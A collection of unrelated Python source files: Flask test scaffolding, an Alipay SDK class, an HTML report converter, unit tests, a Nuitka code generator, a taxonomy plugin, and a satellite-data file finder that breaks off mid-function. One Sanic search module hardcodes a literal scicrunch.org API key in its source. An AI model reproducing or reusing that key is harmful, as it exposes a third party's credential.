from .ecdsa import is_public_pair_valid, public_pair_for_secret_exponent, public_pair_for_x, possible_public_pairs_for_signature, sign, verify
from .ellipticcurve import CurveFp, Point
from .secp256k1 import generator_secp256k1
|
from unittest import TestCase
from flask import Flask
from flask.ctx import AppContext
from flask.testing import FlaskClient
from flask_restful import Api
from flask_sqlalchemy import SQLAlchemy
from src.master.appfactory import AppFactory
from src.db import db
class BaseTest(TestCase):
@classmethod
def setUpClass(cls):
cls.factory: AppFactory = AppFactory()
cls.app: Flask = cls.factory.up()[0]
cls.api: Api = cls.factory.api
cls.app_context: AppContext = cls.app.app_context()
cls.app_context.push()
cls.test_client: FlaskClient = cls.app.test_client()
cls.db: SQLAlchemy = db
cls.original_tables = cls.db.metadata.sorted_tables
@classmethod
def tearDownClass(cls):
cls.db.engine.dispose()
cls.app_context.pop()
def setUp(self):
self.db.create_all()
def tearDown(self):
self.db.session.remove()
self.db.reflect()
self.drop_all()
def url_for(self, resource, **values):
adapter = self.app.url_map.bind('localhost:5000')
return adapter.build(resource.endpoint, values, force_external=True)
def drop_all(self):
for tbl in reversed(self.db.metadata.sorted_tables):
tbl.drop(self.db.engine)
if tbl not in self.original_tables:
self.db.metadata.remove(tbl)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.SchoolCardInfo import SchoolCardInfo
class AlipayCommerceEducateCampuscardQueryResponse(AlipayResponse):
def __init__(self):
super(AlipayCommerceEducateCampuscardQueryResponse, self).__init__()
self._alipay_card_list = None
@property
def alipay_card_list(self):
return self._alipay_card_list
@alipay_card_list.setter
def alipay_card_list(self, value):
if isinstance(value, list):
self._alipay_card_list = list()
for i in value:
if isinstance(i, SchoolCardInfo):
self._alipay_card_list.append(i)
else:
self._alipay_card_list.append(SchoolCardInfo.from_alipay_dict(i))
def parse_response_content(self, response_content):
response = super(AlipayCommerceEducateCampuscardQueryResponse, self).parse_response_content(response_content)
if 'alipay_card_list' in response:
self.alipay_card_list = response['alipay_card_list']
|
import collections
from itertools import groupby
from typing import Iterable, List
from . import abc_pdf
from . import entities
from . import helper
from . import templatemanager
__all__ = [
"Empty",
"PyObjToHtmlConverter"
]
def range_subset(range1, range2):
"""Whether range1 is a subset of range2."""
if not range1:
return True # empty range is subset of anything
if not range2:
return False # non-empty range can't be subset of empty range
if len(range1) > 1 and range1.step % range2.step:
return False # must have a single value or integer multiple step
return range1.start in range2 and range1[-1] in range2
def get_value_and_quantity(data):
"""Callback for itertools.groupby.
Returns value and number of repetitions (fetched from groupby)
"""
return data[0], len(list(data[1]))
def _add_column(ranges, range_, column, value, quantity, empty):
"""Function updates information about columns"""
ranges.append(range_)
column.extend(
[entities.CellInfo(value, quantity)]
+ [entities.CellInfo(empty, None) for _ in range(quantity-1)]
)
def group(data, group_indexes=None, *, empty):
"""Function returns grouped data"""
if not data or not data[0]: # если данных нет, возвращаем их
return data
# установка кол-ва столбцов для группировки
group_indexes = (
range(len(data[0])-1)
if group_indexes is None
else list(group_indexes)
)
# храним группированные значения предыдущей колонки для текущей
prev_ranges = []
new_data = [] # результат работы функции будет здесь
data_len = len(data)
data = zip(*data) # транспонируем, чтобы идти по столбцам
for i, column in enumerate(data):
acc_column = [] # храним группированные значения
curr_ranges = [] # храним индексы группировки
if i not in group_indexes:
for j in range(data_len):
_add_column(
curr_ranges, range(j, j + 1),
acc_column, column[j], 1, empty
)
new_data.append(acc_column)
prev_ranges = curr_ranges[:]
continue
index = 0 # индекс указывает на позицию в столбце
for v, n in map(get_value_and_quantity, groupby(column)):
curr_range = range(index, index + n)
if (
not prev_ranges
or
any(range_subset(curr_range, r) for r in prev_ranges)
): # если можно поместить полностью
_add_column(
curr_ranges, curr_range,
acc_column, v, n,
empty
)
else: # разбить на подходящие части
new_index = index
last_index = index + n
# идем по отрезкам предыдущего столбца и разбиваем текущий
for r in prev_ranges:
if new_index not in r:
continue
curr_range = range(new_index, last_index)
if range_subset(curr_range, r):
temp_value = last_index - new_index
_add_column(
curr_ranges, curr_range,
acc_column, v, temp_value,
empty
)
break
else:
new_range = range(new_index, r.stop)
temp_value = r.stop - new_index
_add_column(
curr_ranges, new_range,
acc_column, v, temp_value,
empty
)
new_index = r.stop
index += n
new_data.append(acc_column)
prev_ranges = curr_ranges[:]
return list(zip(*new_data))
def to_html(data: List[List[entities.CellInfo]], *, empty):
"""Convert data to html table"""
acc_table = []
for row in data:
acc_row = ["<tr>"]
for elem in row:
if elem.value == empty:
continue
acc_row.append(
"<td rowspan='{}'>{}</td>".format(
elem.quantity, elem.value
)
)
acc_row.append("</tr>")
acc_table.append("\n".join(acc_row))
return "\n".join(acc_table)
class Empty:
"""Class describes 'empty' cell in table"""
class PyObjToHtmlConverter(abc_pdf.AbstractPyObjToHtmlConverter):
"""Convert data from object to str (html-markup)"""
def __init__(self, template_manager=None):
template_manager = (
template_manager or templatemanager.DefaultTemplateManager()
)
helper.check_isinstance(
(template_manager, abc_pdf.AbstractTemplateManager)
)
self.template_manager = template_manager
def convert(self, report: entities.Report) -> str:
title = self.convert_title(
report.title, len(report.fields)
)
fields = self.convert_fields(
report.fields
)
html_table_data = self.convert_data(
report.data, report.grouping
)
totals = self.convert_totals(
report.totals, len(report.fields)
)
html_table = (
"<table>"
+ title + fields + html_table_data + totals
+ "</table>"
)
return self.template_manager.render(table=html_table)
def convert_data(self, data, group_indexes=None, empty=Empty()):
grouped_data = group(data, group_indexes, empty=empty)
html_data = to_html(grouped_data, empty=empty)
return html_data
def convert_title(self, title, number_of_fields):
return (
"<tr>"
+ "<th colspan='{}' align='center'> {} </th>".format(
number_of_fields, title
)
+ "</tr>"
)
def convert_fields(self, fields):
return (
"<tr>"
+ "".join("<th>{}</th>".format(i) for i in fields)
+ "</tr>"
)
def convert_totals(
self,
totals_results: List[entities.TotalsResult],
number_of_fields
):
totals_positions = {
t.totals_info.position: t
for t in totals_results
}
totals_value = "<tr>"
totals_title = "<tr>"
cell_template = "<td>{}</td>"
for position in range(number_of_fields):
t_res = totals_positions.get(position)
if t_res is None:
template_title_data = ""
template_value_data = ""
else:
template_title_data = t_res.totals_info.title
template_value_data = t_res.result
totals_title = (
cell_template.format(template_title_data)
+ totals_title
)
totals_value = (
cell_template.format(template_value_data)
+ totals_value
)
totals_value += "</td>"
totals_title += "</td>"
empty_line = (
"<tr>"
+ "<td colspan='{}'></td>".format(number_of_fields)
+ "</tr>"
)
return empty_line + totals_title + totals_value |
# /***********************************************************************
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Note that these code samples being shared are not official Google
# products and are not formally supported.
# ************************************************************************/
import os
import unittest
import pandas as pd
import app_settings
from csv_decoder import Decoder
from utilities import ViewTypes
from utilities import get_view_name
class AppSettingsTest(unittest.TestCase):
def test_columns(self):
s = app_settings.AppSettings()
self.assertEqual(
s.columns['account_column_name'].default,
'account_name'
)
s.columns['account_column_name'].value = 'Account'
dict_map = {val.value:val.default for val in s.columns.values()}
self.assertIn('Account', dict_map)
class UtilitiesTest(unittest.TestCase):
def test_types(self):
self.assertEqual(
get_view_name(ViewTypes.KEYWORD_MAPPER, '123'),
'KeywordMapper_123'
)
class CSVDecoderTest(unittest.TestCase):
def test_size(self):
file = Decoder('utf-8', './testdata/dirA', map={
'A': 'only_column'
}).run()
self.assertTrue(os.path.isfile(file))
df: pd.DataFrame = pd.read_csv(file)
self.assertEqual(len(df.columns), 1)
self.assertTrue('only_column' in df)
desired_list = ['I','a','c','e','g','k','m']
self.assertListEqual(sorted(df['only_column'].values), desired_list)
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright © by Christof Küstner
# ----------------------------------------------------------------------------
# "THE BEER-WARE LICENSE"
# wrote this file. As long as you retain this notice
# you can do whatever you want with this stuff. If we meet some day, and you
# think this stuff is worth it, you can buy me a beer in return.
# Christof Küstner
# ----------------------------------------------------------------------------
"""
@author: CfK
"""
# =============================================================================
# IMPORT
# =============================================================================
import platform
import colorama
import re
import urllib.parse
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.feature_extraction.text import CountVectorizer
from collections import Counter
# =============================================================================
# CONST
# =============================================================================
IS_WINDOWS = platform.system() == "Windows"
IS_MACOS = platform.system() == "Darwin"
IS_LINUX = platform.system() == "Linux"
if IS_WINDOWS:
colorama.init()
# =============================================================================
# DEFINITION
# =============================================================================
def print_title(app_title, app_author, filler, terminal_size):
title = " "
title += colorama.Style.BRIGHT + app_title + colorama.Style.RESET_ALL
title += " by "
title += colorama.Style.BRIGHT + app_author + colorama.Style.RESET_ALL
title += " " + 3*filler
print(title.rjust(terminal_size, filler) + colorama.Style.RESET_ALL)
print()
def print_colored_status(text, status_color_id=0):
# status to color store
COLORS = (colorama.Fore.RED + colorama.Style.BRIGHT,
colorama.Fore.GREEN + colorama.Style.BRIGHT,
colorama.Fore.YELLOW + colorama.Style.BRIGHT)
# print colored status
if status_color_id < len(COLORS):
if status_color_id == 0:
print(COLORS[status_color_id] + ">>> " +
text + colorama.Style.RESET_ALL)
else:
print(COLORS[status_color_id] + ">>> " +
colorama.Style.RESET_ALL + text)
else:
print(text)
def get_cache_csv(url):
return r"predatory_cache_{}.csv".format(urllib.parse.quote(url, safe=""))
def highlight_similarity(hl_words, sentence):
re_from = r"(" + r"|".join(hl_words.replace(r"(", r"\(").
replace(r")", r"\)").split(" ")) + r")"
re_to = colorama.Fore.LIGHTCYAN_EX + r"\1" + colorama.Style.RESET_ALL
return re.sub(re_from, re_to, sentence)
def get_jaccard_sim_score(str1, str2):
a = set(str1.split())
b = set(str2.split())
c = a.intersection(b)
return float(len(c)) / (len(a) + len(b) - len(c))
def get_vectors(*strs):
text = [t for t in strs]
vectorizer = CountVectorizer(text)
vectorizer.fit(text)
return vectorizer.transform(text).toarray()
def get_cosine_sim_score(*strs):
vectors = [t for t in get_vectors(*strs)]
return cosine_similarity(vectors)
def score_color(score, thresholds):
thr0, thr1, thr2 = thresholds
if thr0 <= score < thr1:
return colorama.Fore.YELLOW
elif thr1 <= score < thr2:
return colorama.Fore.LIGHTRED_EX + \
colorama.Style.BRIGHT
else:
return colorama.Back.RED + colorama.Fore.BLACK
def print_report(report, thresholds):
for bib_key, bib_matches in report.items():
# report bib_key
print("Similarites found in '{}{}{}':".format(
colorama.Back.WHITE + colorama.Fore.BLACK,
bib_key,
colorama.Style.RESET_ALL
))
for bib_field, (bib_entry, pj_matches) in bib_matches.items():
# report bib_field
print(" {} : {}{}{}".format(
bib_field.rjust(15, " "),
colorama.Fore.WHITE + colorama.Style.BRIGHT,
bib_entry,
colorama.Style.RESET_ALL
))
# print match
for similarity_score, pj_name, pj_url in \
sorted(pj_matches, reverse=True):
print(" {}{}{:.2f}{} | {} >> URL:{}".format(
" " * (15 - 4),
score_color(similarity_score, thresholds),
similarity_score,
colorama.Style.RESET_ALL,
highlight_similarity(
bib_entry, pj_name.ljust(100, " ")),
pj_url
))
|
name = "gfm-toc"
__version__ = '0.0.7'
from .md_toc import main |
import os
import requests
from sanic.response import json, text, html
api_key = '6u6izfSzCHTqVvphJ28lUbAtX0nXGhrd'
def loadMain():
fileName = os.path.join(os.path.dirname(__file__), 'main.html')
try:
f = open(fileName, "r")
htmlText = f.read()
f.close()
except:
return html("We are sorry,there was an error ..., %s is not found"%fileName)
return html(htmlText)
def getSearch(request):
"""
Searching function: an interface to elasticsearch
"""
summary = {}
url = 'https://scicrunch.org/api/1/elastic/SPARC_PortalDatasets_pr/_search?api_key='+api_key
size = '200'
query = {
"size": size,
"from": 0,
"_source":{
"includes":["item.keywords","item.name",
"item.readme",
"item.description",
"pennsieve.versionPublishedAt",
"pennsieve.banner",
"pennsieve.identifier",
"contributors.last",
"contributors.first"],
},
}
q = request.args['query'][0]
force = 'no' if 'force' not in request.args else request.args['force'][0]
if 'query' in request.args:
query['query'] = {"query_string": {"query": q}}
summary['query'] = q
summary['executed'] = q
summary['force'] = force
summary['suggestions'] = __getSuggestions(q, 10)
if force != 'yes':
autocomplete = __getAutoComplete(request.args['query'][0], 1, 'no')
if q.lower() not in autocomplete:
if len(summary['suggestions']) > 0:
query['query'] = {"query_string": {"query": summary['suggestions'][0]}}
summary['executed'] = summary['suggestions'][0]
# if 'query' in request.args:
# query['query'] = {"query_string": {"query": q}}
response = requests.post(url, json=query)
summary['total'] = response.json()['hits']['total']
summary['filters'] = {'keywords':{}, 'authors':{}}
summary['sorts'] = {'ranking':[],'date':[]}
summary['hits'] = {}
dates, srtDates = [], []
for hit in response.json()['hits']['hits']:
idx = hit['_source']['pennsieve']['identifier']
# extract filters
## extract from keywords
for key in hit['_source']['item']['keywords']:
if key['keyword'] in summary['filters']['keywords']:
summary['filters']['keywords'][key['keyword']] += [idx]
else:
summary['filters']['keywords'][key['keyword']] = [idx]
## extract from contributors
for key in hit['_source']['contributors']:
name = key['first']['name'] + ' ' + key['last']['name']
if name in summary['filters']['authors']:
summary['filters']['authors'][name] += [idx]
else:
summary['filters']['authors'][name] = [idx]
# extract sorting based on ranking
summary['sorts']['ranking'] += [idx]
# extract sorting based on dates
dates += [hit['_source']['pennsieve']['versionPublishedAt']['timestamp']]
srtDates += [idx]
# set hit
ht = {'url': 'https://sparc.science/datasets/'+idx,
'banner': hit['_source']['pennsieve']['banner']['uri'],
'_id': hit['_id'],
'_score': hit['_score'],
'date': hit['_source']['pennsieve']['versionPublishedAt']['timestamp'],
'name': hit['_source']['item']['name'],
'description': hit['_source']['item']['description'],
'readme': hit['_source']['item']['readme'],
}
summary['hits'][idx] = ht
# sort based on dates
if len(dates) > 0: # when there are results
dates, srtDates = zip(*sorted(zip(dates, srtDates),reverse=True))
summary['sorts']['date'] = list(srtDates)
return json(summary)
def getSuggestions(request):
"""
get suggestions function
"""
if 'query' not in request.args: return json({})
query = request.args['query'][0]
limit = request.args['limit'] if 'limit' in request.args else '10'
return json(__getSuggestions(query, limit))
def __getSuggestions(query, limit):
url = 'https://scicrunch.org/api/1/scigraph/vocabulary/suggestions/'+query
params = {'api_key':api_key,'limit':limit}
rsp = requests.get(url, params=params)
return rsp.json()
def getAutoComplete(request):
"""
get autocomplete function
"""
if 'query' not in request.args: return json({})
query = request.args['query'][0]
limit = request.args['limit'] if 'limit' in request.args else '10'
verbose = 'no' if 'verbose' not in request.args else request.args['verbose'][0]
return json(__getAutoComplete(query, limit, verbose))
def __getAutoComplete(query, limit, verbose):
url = 'https://scicrunch.org/api/1/scigraph/vocabulary/autocomplete/'+query
params = {'api_key':api_key,'limit':limit,'searchSynonyms':'true','searchAbbreviations':'false','searchAcronyms':'false','includeDeprecated':'false'}
rsp = requests.get(url, params=params)
if verbose == 'yes': return json(rsp.json())
completions = []
for completion in rsp.json():
cmp = completion['completion'].lower()
if cmp not in completions:
completions += [cmp]
for cmp in completion['concept']['labels']:
if cmp.lower() not in completions:
completions += [cmp.lower()]
for cmp in completion['concept']['synonyms']:
if cmp.lower() not in completions:
completions += [cmp.lower()]
for cmp in completion['concept']['abbreviations']:
if cmp.lower() not in completions:
completions += [cmp.lower()]
return completions
|
# Copyright 2018-2020 Streamlit Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import streamlit as st
import numpy as np
import pandas as pd
import pydeck as pdk
# Empty chart.
st.pydeck_chart()
# Basic chart.
np.random.seed(12345)
df = pd.DataFrame(
np.random.randn(1000, 2) / [50, 50] + [37.76, -122.4], columns=["lat", "lon"]
)
st.pydeck_chart(
pdk.Deck(
map_style="mapbox://styles/mapbox/light-v9",
initial_view_state=pdk.ViewState(
latitude=37.76, longitude=-122.4, zoom=11, pitch=50,
),
layers=[
pdk.Layer(
"HexagonLayer",
data=df,
get_position="[lon, lat]",
radius=200,
elevation_scale=4,
elevation_range=[0, 1000],
pickable=True,
extruded=True,
),
pdk.Layer(
"ScatterplotLayer",
data=df,
get_position="[lon, lat]",
get_color="[200, 30, 0, 160]",
get_radius=200,
),
],
)
)
|
# Copyright 2021, Kay Hayen, mailto:kay.hayen@gmail.com
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Low level variable code generation.
"""
from nuitka.nodes.shapes.BuiltinTypeShapes import (
tshape_bool,
tshape_int_or_long,
)
from nuitka.PythonVersions import python_version
from .c_types.CTypeNuitkaBools import CTypeNuitkaBoolEnum
from .c_types.CTypePyObjectPtrs import (
CTypeCellObject,
CTypePyObjectPtr,
CTypePyObjectPtrPtr,
)
from .CodeHelpers import (
decideConversionCheckNeeded,
generateExpressionCode,
withObjectCodeTemporaryAssignment2,
)
from .ErrorCodes import (
getAssertionCode,
getErrorExitCode,
getLocalVariableReferenceErrorCode,
getNameReferenceErrorCode,
)
from .VariableDeclarations import VariableDeclaration
def generateAssignmentVariableCode(statement, emit, context):
assign_source = statement.subnode_source
variable = statement.getVariable()
variable_trace = statement.getVariableTrace()
if variable.isModuleVariable():
# Use "object" for module variables.
tmp_name = context.allocateTempName("assign_source")
else:
source_shape = assign_source.getTypeShape()
variable_declaration = getLocalVariableDeclaration(
context, variable, variable_trace
)
if source_shape is tshape_bool and variable_declaration.c_type == "nuitka_bool":
tmp_name = context.allocateTempName("assign_source", "nuitka_bool")
elif (
source_shape is tshape_int_or_long
and variable_declaration.c_type == "nuitka_ilong"
):
tmp_name = context.allocateTempName("assign_source", "nuitka_ilong")
else:
tmp_name = context.allocateTempName("assign_source")
generateExpressionCode(
expression=assign_source, to_name=tmp_name, emit=emit, context=context
)
getVariableAssignmentCode(
tmp_name=tmp_name,
variable=variable,
variable_trace=variable_trace,
needs_release=statement.needsReleasePreviousValue(),
in_place=statement.isInplaceSuspect(),
emit=emit,
context=context,
)
# Ownership of that reference must have been transferred.
assert not context.needsCleanup(tmp_name)
def generateDelVariableCode(statement, emit, context):
old_source_ref = context.setCurrentSourceCodeReference(
statement.getSourceReference()
)
_getVariableDelCode(
variable=statement.getVariable(),
variable_trace=statement.variable_trace,
previous_trace=statement.previous_trace,
tolerant=statement.isTolerant(),
needs_check=statement.isTolerant()
or statement.mayRaiseException(BaseException),
emit=emit,
context=context,
)
context.setCurrentSourceCodeReference(old_source_ref)
def getVariableReferenceCode(
to_name, variable, variable_trace, needs_check, conversion_check, emit, context
):
if variable.isModuleVariable():
owner = context.getOwner()
with withObjectCodeTemporaryAssignment2(
to_name, "mvar_value", conversion_check, emit, context
) as value_name:
# TODO: Rather have this passed from a distinct node type, so inlining
# doesn't change things.
emit(
"""\
%(value_name)s = GET_STRING_DICT_VALUE(moduledict_%(module_identifier)s, (Nuitka_StringObject *)%(var_name)s);
if (unlikely(%(value_name)s == NULL)) {
%(value_name)s = %(helper_code)s(%(var_name)s);
}
"""
% {
"helper_code": "GET_MODULE_VARIABLE_VALUE_FALLBACK_IN_FUNCTION"
if python_version < 0x340
and not owner.isCompiledPythonModule()
and not owner.isExpressionClassBody()
else "GET_MODULE_VARIABLE_VALUE_FALLBACK",
"module_identifier": context.getModuleCodeName(),
"value_name": value_name,
"var_name": context.getConstantCode(constant=variable.getName()),
}
)
getErrorExitCode(
check_name=value_name,
emit=emit,
context=context,
needs_check=needs_check,
)
else:
variable_declaration = getLocalVariableDeclaration(
context, variable, variable_trace
)
value_name = variable_declaration.getCType().emitValueAccessCode(
value_name=variable_declaration, emit=emit, context=context
)
if needs_check:
condition = value_name.getCType().getInitTestConditionCode(
value_name, inverted=True
)
getLocalVariableReferenceErrorCode(
variable=variable, condition=condition, emit=emit, context=context
)
else:
value_name.getCType().emitValueAssertionCode(
value_name=value_name, emit=emit
)
to_name.getCType().emitAssignConversionCode(
to_name=to_name,
value_name=value_name,
needs_check=conversion_check,
emit=emit,
context=context,
)
def generateVariableReferenceCode(to_name, expression, emit, context):
variable = expression.getVariable()
variable_trace = expression.getVariableTrace()
needs_check = expression.mayRaiseException(BaseException)
getVariableReferenceCode(
to_name=to_name,
variable=variable,
variable_trace=variable_trace,
needs_check=needs_check,
conversion_check=decideConversionCheckNeeded(to_name, expression),
emit=emit,
context=context,
)
def _getVariableCodeName(in_context, variable):
if in_context:
# Closure case:
return "closure_" + variable.getCodeName()
elif variable.isParameterVariable():
return "par_" + variable.getCodeName()
elif variable.isTempVariable():
return "tmp_" + variable.getCodeName()
else:
return "var_" + variable.getCodeName()
def getPickedCType(variable, context):
""" Return type to use for specific context. """
user = context.getEntryPoint()
owner = variable.getEntryPoint()
if owner is user:
if variable.isSharedTechnically():
# TODO: That need not really be an impedient, we could share pointers to
# everything.
result = CTypeCellObject
else:
shapes = variable.getTypeShapes()
if len(shapes) > 1:
# Avoiding this for now, but we will have to use our enum
# based code variants, either generated or hard coded in
# the future.
if len(shapes) > 1:
return CTypePyObjectPtr
r = shapes.pop().getCType()
return r
elif context.isForDirectCall():
if variable.isSharedTechnically():
result = CTypeCellObject
else:
result = CTypePyObjectPtrPtr
else:
result = CTypeCellObject
return result
def decideLocalVariableCodeType(context, variable):
# Now must be local or temporary variable.
# Complexity should be moved out of here, pylint: disable=too-many-branches
user = context.getOwner()
owner = variable.getOwner()
user = user.getEntryPoint()
prefix = ""
if owner.isExpressionOutlineFunctionBase():
entry_point = owner.getEntryPoint()
prefix = (
"outline_%d_"
% entry_point.getTraceCollection().getOutlineFunctions().index(owner)
)
owner = entry_point
if variable.isTempVariableBool():
c_type = CTypeNuitkaBoolEnum
else:
c_type = getPickedCType(variable, context)
if owner is user:
result = _getVariableCodeName(in_context=False, variable=variable)
result = prefix + result
elif context.isForDirectCall():
if user.isExpressionGeneratorObjectBody():
closure_index = user.getClosureVariableIndex(variable)
result = "generator->m_closure[%d]" % closure_index
elif user.isExpressionCoroutineObjectBody():
closure_index = user.getClosureVariableIndex(variable)
result = "coroutine->m_closure[%d]" % closure_index
elif user.isExpressionAsyncgenObjectBody():
closure_index = user.getClosureVariableIndex(variable)
result = "asyncgen->m_closure[%d]" % closure_index
else:
result = _getVariableCodeName(in_context=True, variable=variable)
result = prefix + result
else:
closure_index = user.getClosureVariableIndex(variable)
if user.isExpressionGeneratorObjectBody():
result = "generator->m_closure[%d]" % closure_index
elif user.isExpressionCoroutineObjectBody():
result = "coroutine->m_closure[%d]" % closure_index
elif user.isExpressionAsyncgenObjectBody():
result = "asyncgen->m_closure[%d]" % closure_index
else:
# TODO: If this were context.getContextObjectName() this would be
# a one liner.
result = "self->m_closure[%d]" % closure_index
return result, c_type
def getLocalVariableDeclaration(context, variable, variable_trace):
# TODO: Decide if we will use variable trace, pylint: disable=unused-argument
# Now must be local or temporary variable.
user = context.getOwner()
owner = variable.getOwner()
user = user.getEntryPoint()
prefix = ""
if owner.isExpressionOutlineFunctionBase():
entry_point = owner.getEntryPoint()
prefix = (
"outline_%d_"
% entry_point.getTraceCollection().getOutlineFunctions().index(owner)
)
owner = entry_point
if owner is user:
result = _getVariableCodeName(in_context=False, variable=variable)
result = prefix + result
result = context.variable_storage.getVariableDeclarationTop(result)
assert result is not None, variable
return result
else:
closure_index = user.getClosureVariableIndex(variable)
return context.variable_storage.getVariableDeclarationClosure(closure_index)
def getVariableAssignmentCode(
context, emit, variable, variable_trace, tmp_name, needs_release, in_place
):
# For transfer of ownership.
if context.needsCleanup(tmp_name):
ref_count = 1
else:
ref_count = 0
if variable.isModuleVariable():
variable_declaration = VariableDeclaration(
"module_var", variable.getName(), None, None
)
else:
variable_declaration = getLocalVariableDeclaration(
context, variable, variable_trace
)
assert variable_declaration, (variable, context)
if variable.isLocalVariable():
context.setVariableType(variable, variable_declaration)
variable_declaration.getCType().emitVariableAssignCode(
value_name=variable_declaration,
needs_release=needs_release,
tmp_name=tmp_name,
ref_count=ref_count,
in_place=in_place,
emit=emit,
context=context,
)
if ref_count:
context.removeCleanupTempName(tmp_name)
def _getVariableDelCode(
variable, variable_trace, previous_trace, tolerant, needs_check, emit, context
):
if variable.isModuleVariable():
variable_declaration_old = VariableDeclaration(
"module_var", variable.getName(), None, None
)
variable_declaration_new = variable_declaration_old
else:
variable_declaration_old = getLocalVariableDeclaration(
context, variable, previous_trace
)
variable_declaration_new = getLocalVariableDeclaration(
context, variable, variable_trace
)
# TODO: We need to split this operation in two parts. Release and init
# are not one thing, until then require this.
assert variable_declaration_old == variable_declaration_new
if variable.isLocalVariable():
context.setVariableType(variable, variable_declaration_new)
if needs_check and not tolerant:
to_name = context.getBoolResName()
else:
to_name = None
variable_declaration_old.getCType().getDeleteObjectCode(
to_name=to_name,
value_name=variable_declaration_old,
tolerant=tolerant,
needs_check=needs_check,
emit=emit,
context=context,
)
if needs_check and not tolerant:
if variable.isModuleVariable():
getNameReferenceErrorCode(
variable_name=variable.getName(),
condition="%s == false" % to_name,
emit=emit,
context=context,
)
elif variable.isLocalVariable():
getLocalVariableReferenceErrorCode(
variable=variable,
condition="%s == false" % to_name,
emit=emit,
context=context,
)
else:
getAssertionCode(check="%s != false" % to_name, emit=emit)
def generateVariableReleaseCode(statement, emit, context):
variable = statement.getVariable()
# Only for normal variables we do this.
assert not variable.isModuleVariable()
variable_trace = statement.getVariableTrace()
if variable.isSharedTechnically():
# TODO: We might start to not allocate the cell object, then a check
# would be due. But currently we always allocate it.
needs_check = False
else:
needs_check = not variable_trace.mustHaveValue()
value_name = getLocalVariableDeclaration(context, variable, variable_trace)
c_type = value_name.getCType()
if not needs_check:
c_type.emitReleaseAssertionCode(value_name=value_name, emit=emit)
c_type.getReleaseCode(value_name=value_name, needs_check=needs_check, emit=emit)
c_type.emitReinitCode(value_name=value_name, emit=emit)
|
import sys
class KronaTreePlugin:
def input(self, filename):
self.kronafile = open(filename, 'r')
def run(self):
self.kingdoms = set()
self.phyla = set()
self.classes = set()
self.orders = set()
self.families = set()
self.genera = set()
self.species = set()
self.strains = set()
for line in self.kronafile:
contents = line.strip().split('\t')
if (len(contents) > 3):
self.kingdoms.add(contents[3])
if (len(contents) > 4):
self.phyla.add(contents[4])
if (len(contents) > 5):
self.classes.add(contents[5])
if (len(contents) > 6):
self.orders.add(contents[6])
if (len(contents) > 7):
self.families.add(contents[7])
if (len(contents) > 8):
self.genera.add(contents[8])
if (len(contents) > 9):
self.species.add(contents[9])
if (len(contents) > 10):
self.strains.add(contents[10])
if (len(contents) > 11):
print("WARNING: MORE THAN 11 ENTRIES: "+line.strip().replace('\t', '|'))
def output(self, filename):
outkingdom = open(filename+".kingdom.txt", 'w')
for kingdom in self.kingdoms:
outkingdom.write(kingdom+"\n")
outphylum = open(filename+".phylum.txt", 'w')
for phylum in self.phyla:
outphylum.write(phylum+"\n")
outclass = open(filename+".class.txt", 'w')
for theclass in self.classes:
outclass.write(theclass+"\n")
outorder = open(filename+".order.txt", 'w')
for order in self.orders:
outorder.write(order+"\n")
outfamily = open(filename+".family.txt", 'w')
for family in self.families:
outfamily.write(family+"\n")
outgenus = open(filename+".genus.txt", 'w')
for genus in self.genera:
outgenus.write(genus+"\n")
outspecies = open(filename+".species.txt", 'w')
for speci in self.species:
outspecies.write(speci+"\n")
outstrain = open(filename+".strain.txt", 'w')
for strain in self.strains:
outstrain.write(strain+"\n")
|
# coding:utf-8
"""
Created on 2018年4月10日
@author: anning
"""
import re
import os
import sys
import h5py
from datetime import datetime
import numpy as np
from configobj import ConfigObj
from dateutil.relativedelta import relativedelta
from PB import pb_time
def dcc_find_file(ipath, ifile, c_date, rolldays):
"""
ipath:文件输入路径 其中携带的%YYYY%MM%DD 会根据真实日期替换
ifile:文件名称 其中携带的%YYYY%MM%DD 会根据真实日期替换
c_date:当前日期
rolldays:滚动天数
return:找到符合条件的所有全路径的文件清单
"""
FileLst = []
# c_date 当前时间
# F_date 向前滚动后的首个日期
if not isinstance(rolldays, int):
rolldays = int(rolldays)
F_date = c_date - relativedelta(days=(rolldays - 1))
while F_date <= c_date:
ymd = F_date.strftime('%Y%m%d')
# 替换字符中的%YYYY%MM%DD为当前输入时间
ex_ipath = ipath.replace('%YYYY', ymd[0:4])
ex_ipath = ex_ipath.replace('%MM', ymd[4:6])
ex_ipath = ex_ipath.replace('%DD', ymd[6:8])
ex_ifile = ifile.replace('%YYYY', ymd[0:4])
ex_ifile = ex_ifile.replace('%MM', ymd[4:6])
ex_ifile = ex_ifile.replace('%DD', ymd[6:8])
FullFile = os.path.join(ex_ipath, ex_ifile)
if os.path.isfile(FullFile):
FileLst.append(FullFile)
F_date = F_date + relativedelta(days=1)
return FileLst
class DccDataRead(object):
"""
percent:数据集中的dcc_percent
dn:数据集中的DN_ADMS
ref:数据集中的REF_ADMS
"""
def __init__(self):
self.empty = True
self.percent = None
self.dn = None
self.ref = None
self.FileLst = []
def load(self):
for iFile in self.FileLst:
try:
